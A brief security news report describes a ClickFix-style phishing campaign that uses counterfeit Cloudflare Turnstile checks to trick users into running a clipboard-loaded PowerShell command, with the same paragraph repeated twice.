Threat actors have leveraged counterfeit Cloudflare Turnstile challenges used to check 'humanness' to facilitate clandestine malware compromise as part of a new ClickFix-style campaign, SecurityWeek reports.
Intrusions involved luring targets into visiting a phishing site that displays the fake Turnstile page and loads a malicious PowerShell command into the clipboard, a report from SlashNext showed. Subsequent user verification is then followed by instructions that open the Windows Run dialog box, copy clipboard content, and execute the command, which facilitates in-memory execution of the malware, SlashNext researchers said. Such an attack scheme, which merges living-off-the-land binaries and social engineering tactics, is challenging to detect without the presence of additional security controls, according to cybersecurity experts. "Because of their limited visibility into browser behavior, AV products and other endpoint protection solutions tend to miss these attacks," said Menlo Security Chief Security Architect Lionel Litty.
Intrusions involved luring targets into visiting a phishing site that displays the fake Turnstile page and loads a malicious PowerShell command into the clipboard, a report from SlashNext showed. Subsequent user verification is then followed by instructions that open the Windows Run dialog box, copy clipboard content, and execute the command, which facilitates in-memory execution of the malware, SlashNext researchers said. Such an attack scheme, which merges living-off-the-land binaries and social engineering tactics, is challenging to detect without the presence of additional security controls, according to cybersecurity experts. "Because of their limited visibility into browser behavior, AV products and other endpoint protection solutions tend to miss these attacks," said Menlo Security Chief Security Architect Lionel Litty.
